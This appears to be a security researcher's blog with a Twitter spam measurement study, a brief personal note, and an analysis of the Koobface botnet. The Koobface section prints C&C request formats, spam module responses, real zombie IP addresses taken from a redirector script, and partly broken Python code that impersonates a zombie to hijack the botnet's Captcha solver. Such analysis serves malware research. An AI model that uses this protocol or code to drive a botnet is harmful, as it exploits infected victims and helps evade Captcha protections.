@spam: The underground on 140 characters or less

This post is based on research to appear in CCS 2010 — an advance pdf is available under my publications

To understand spam propagating within Twitter, we plugged into Twitter’s streaming API and monitored tweets submitted to the site over the course of one month. Given that we have no pre-existing notion of what spam ‘looks like’, we use three blacklists to flag URLs previously identified in email spam: Google Safebrowsing, URIBL, and Joewein. Due to the potential of URL shortening provided by services such as bit.ly or other obfuscation techniques, we crawl each URL until reaching the final landing page and use the domain for determining blacklist presence.

During our monitoring we gathered over 200 million tweets from the stream and crawled 25 million URLs. Over 3 million tweets were identified as spam. Of the URLs crawled, 2 million were identified as spam by blacklists, 8% of all unique links. Of these blacklisted URLs, 5% were malware and phishing, while the remaining 95% directed users towards scams.

Spam Breakdown by Type

Twitter presents itself as an entirely different delivery mechanism from email, with a vastly different audience. For that reason, we analyzed the breakdown of spam on Twitter to understand which players were involved and how they correspond to spam directed at email. As shown in the figure below, many of the traditional email scams have found their way onto Twitter, but a new category purporting an easy solution to generating Twitter followers has appeared, largely directing users to phishing pages that steal Twitter credentials.


Abuse of Twitter Features

Given the limitation of 140 characters to attract a victim’s attention, Twitter scams have evolved to abuse Twitter’s core features such as @mentions, #hashtags, and RT @ retweets.

Callouts are mentions used to target specific users in order to infiltrate their feed and appear personalized. In our data set, roughly 10% of scams were advertised using personalized mentions, while only 3% of phishing/malware used the feature. An example would be: Win an iTouch AND a $150 Apple gift card @victim! http://spam.com

Retweet Hijacking is an attempt to abuse the credibility of other users to draw a wider audience or increase trust. Given a tweet from a trusted user such as @barackobama A great battle is ahead of us…, a spammer will prepend a link and retweet the original text: http://spam.com RT @barackobama A great battle is ahead of us…. Because modifying and retweeting is common behavior, there is no simple mechanism to detect forgeries or malicious behavior.

Retweet Purchasing relies on other trusted parties to retweet spam tweets. Services such as retweet.it purport to retweet a message 50 times to 2,500 Twitter followers for $5 or 300 times to 15,000 followers for $30. The accounts used to retweet are other Twitter members (or bots) who sign up for the retweet service, allowing their accounts to be used to generate traffic.

Trend Setting is an attempt to create a trending topic on Twitter by abusing hundreds of compromised/fake accounts all tweeting with the same #hashtag. We encountered a total of 12 different attempts to generate trends using roughly 2,000 accounts each, all purporting to provide users with more followers if they provide their account credentials. Of tweets in our data set, roughly 70% of all phishing tweets included a trend setting #hashtag.

Trend Hijacking allows spammers to ride on the success of currently trending topics, allowing spam tweets to be syndicated to the entire Twittersphere rather than a limited audience of followers. Of all the #hashtags we encountered in spam, roughly 86% were user-generated topics. An example would be Help donate to #haiti relief: http://spam.com.

How Successful is Twitter Spam?

Despite widespread abuse of Twitter by spammers, the current mechanisms in place to prevent spam are fairly limited. Twitter currently uses Google’s Safebrowsing API to block malicious links, simultaneously relying on account heuristics such as aggressive friending/unfriending and repeated tweets to detect spam behavior. Paired with a system designed for the dissemination of links and information, Twitter is an ideal propagation platform for spam.

To estimate Twitter clickthrough, we measure the ratio of clicks a link receives, reported by bit.ly compared to the number of tweets sent. Given the broadcast nature of tweeting, we measure reach as a function of both the total tweets sent t and the followers exposed to each tweet f, where reach equals txf . In the event multiple accounts with potentially variable number of followers all participate in tweeting a single URL, we measure total reach as the sum of each individual account’s reach. Averaging the ratio of clicks to reach for 245,000 bit.ly URLs, we find roughly 0.13% of spam tweets generate a visit, orders of magnitude higher when compared to clickthrough rates of 0.003-0.006% reported for spam email.

Twitter’s improved clickthrough rate compared to email has a number of explanations. First, users are faced with only 140 characters in which to base their decision whether a URL is spam. Paired with an implicit trust for accounts users befriend, increased clickthrough potentially results from a mixture of naivety and lack of information. This result highlights the need for social networks to quickly adapt to spam threats, adopting similar controls to email, though within a real-time framework.

Zion to California

Perhaps worthy of an update, I recently moved out to California to begin working for Dawn Song and Vern Paxon as a researcher at the University of California, Berkeley. If the cards have it, I hope to continue my Ph.D. work here. On the drive out I spent a few days in Zion camping and day hiking. Flickr describes the experience better than I can.

Koobface Spam

The Koobface botnet preys on social networking sites as its primary means of propagation. Unsuspecting victims browsing Facebook, Twitter, and other social networks are sent messages from users they believe to be friends. In truth, these users are either compromised accounts that fell for one of Koobface’s scams or fraudulent accounts created by Koobface. The messages sent by Koobface can be recovered by directly interacting with the Koobface C&C.

Spamming Modules

The Koobface botnet has unique spamming modules for a multitude of websites including Facebook, MySpace, Twitter, and Bebo. Despite this fact, the network level behaviour for each module follows a generic template:

POST /.sys/?action=[module name]&v=[version]

At the current time, Koobface supports 6 modules with varying version numbers. Sending a request with an outdated version will result in a signal to update the module. This can be avoided by using &v=200 for every request, (the version check is a simple less than statement), however, this is a noticeable perturbation from typical zombie behaviour.

fbgen | Facebook
twgen | Twitter
msgen | MySpace
begen | Bebo
tggen | ?
higen | hi5

The responses from each POST are displayed below. Of the modules, only Facebook uses obfuscation. Each response contains a link and an associated message to spam.

POST /.sys/?action=fbgen&v=101
e3 14 a5 17 2d ec a0 4c 94 a3 e2 aa 6c 7e bd a6
2e 84 c1 1c ca d4 fa 55 aa 3b cc 4b 8f d8 f7 28
0f 5d e2 2e 3f b7 f5 30 b5 d8 eb 89 66 f8 89 49
f6 4e 5a e5 0e 7d c2 bd


POST /.sys/?action=twgen&v=08 

TEXT_M|OMFG!! You must see this video!! :))
TEXT_W|OMFG!! You must see this video!! :))
TEXT_S| http://www.stevesummerhill.com/index.html/
#CACHE MD5|51da895e24b09bc45f6b461a107407ee


POST /.sys/?action=msgen&v=26

I olve wathcing you opsing anked!
TEXT_B|Cooooool Video http://bit.ly/4NHlsT
TEXT_C|Cool Video http://bit.ly/4NHlsT

#SAVED 2010-01-22 16:11:36

Compromised Redirectors

Each spam message provided by Koobface contains a link to a compromised website acting as a redirector to Koobface malware. For redundancy, each website is embedded with a list of 20 zombies to forward visitors towards. Given that zombies have unpredictable uptime, the compromised redirector acts as highly available intermediary, while zombies host the actual malware and social engineering attack.

Recovering the IP addresses of zombies pointed to by a redirector is fairly simple as its stored in a largely obfuscated manner:

var b6e = [
'86.' + '126.205.43',
'68.36' + '.78.85',
'19' + '',
'24.235.' + '129.182',
'76' + '.249.244.80',
'98.' + '221.155.223',
'98' + '.208.114.221',
'173' + '.31.203.53',
'79.1' + '16.33.205',
'74.130.' + '134.165',
'88.165.' + '115.173',
'67.24' + '4.2.122',
'99.91' + '.48.26',
'95.' + '35.211.92',
'85.64' + '.111.111',
'173.18' + '.98.113',
'24' + '.99.82.56',
'65.9' + '6.238.254',
'173.' + '22.162.187',
'76' + '.31.51.190',

Once one of the zombies is determined to be available, a victim is redirected to a scam page modelled after Facebook or Youtube.

Hijacking Koobface’s Captcha Solver

One of the interesting challenges of propagating malware through social media is the requirement of obtaining new accounts for spamming. The Koobface botnet automates this process by leveraging zombies to sign up for accounts on Facebook, Gmail, Blogger, and Google Reader. Each of these services requires a solution to a Captcha challenge which Koobface pushes off on a zombie machine’s owner to solve. During the course of infection, a Koobface zombie will repeatedly poll the C&C for Captchas requiring solutions, in turn prompting users with a threat to shutdown unless the Captcha is solved. As any zombie can query the botnet for a Captcha solution, an adversary can re-purpose the botnet into a personal Captcha solver.

Initiating a Request

A Captcha request to the system can target either Google’s Captcha software or reCAPTCHA; in the case of Google, a flag &b=goo is appended to the request. As with most traffic between a zombie and the Koobface C&C, traffic occurs in plaintext over HTTP. Solving a Captcha is initiated by sending an HTTP POST to a Koobface C&C server. The HTTP POST includes the raw JPG data for the Captcha image to be solved, which will be displayed on a victim’s machine.

POST /.sys/?post=true&path=captcha&a=save[&b=goo]

The Koobface server will return a random identifier that’s appended in future requests to the server as a zombie repeatedly probes for a response:

POST /.sys/?post=true&path=captcha&a=query[&b=goo]&id=26076175

For each solution request, the server will respond with one of three states, directing the bot to its appropriate behaviour:

1 | Pending; repeat request at later time
3 | Solution available
0 | Abandon current request; no one has solved in maximum timeout

Solution Mechanism

Once injected, a separate zombie will randomly probe for a Captcha requiring a solution and submit a victim’s response to the C&C. The zombie also reports its version [&v=20], and the number of attempts its made contacting the C&C for a Captcha [&i=0; i++ for each failed attempt].

# Request a Captcha ID requiring a solution. 
GET /.sys/?action=captcha&a=get&i=0&v=20

# Request the image associated with a given ID
GET /.sys/?action=captcha&a=image&i=3&v=20&id=23063812

# Upload a response
GET /.sys/?action=captcha&a=put&id=23063812&v=20&code=valid%20text

Use of the goo flag when injecting a packet is necessary as victims are prompted with different instructions depending on the type of Captcha being solved. Given the wrong flag, a valid solution wont be accepted due to a regular expression mismatch; Google has only one word in its Captchas, while reCATPCHA uses two words.

Enter both words below, separated by a space.|
       ([a-zA-Z0-9\$\.\,\/]+)([ ]+)([a-zA-Z0-9\$\.\,\/]+)
Enter the word below.|

Python Implementation

def send_packet(domain,packet):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((domain, 80))
        resp = s.recv(1024)
        return resp
    except (socket.error,socket.herror,socket.gaierror,socket.timeout):
        logging.error("Failed to query socket")
        return None

def captcha_query():

    # Select a random C&C domain from list of Koobface hosts
    domain = random.choice(CC_DOMAINS)
    domain = re.sub('(http://)?(www\.)?','',domain)

    # Fetch a Captcha image to be solved
    data = fetch_image()
    length = len(data)

    # Mimic Koobface's zombie behavior
    packet = "POST /.sys/?post=true&path=captcha&a=save&b=goo HTTP/1.0\r\n" + \
             "accept-encoding: text/html, text/plain\r\nConnection: close\r\n" + \
             "Host: %s\r\nUser-Agent: Mozilla/5.01 " %(domain)+ \
             "(Windows; U; Windows NT 5.2; ru; rv: " + \
             "Gecko/20050104 Firefox/3.0.2\r\n" + \
             "Content-Type: binary/octet-stream\r\n" + \
             "Content-Length: %s\r\n\r\n" %(length)
    packet = str(packet) + str(data)

    # Sent packet using raw socket
    resp = send_packet(domain,packet)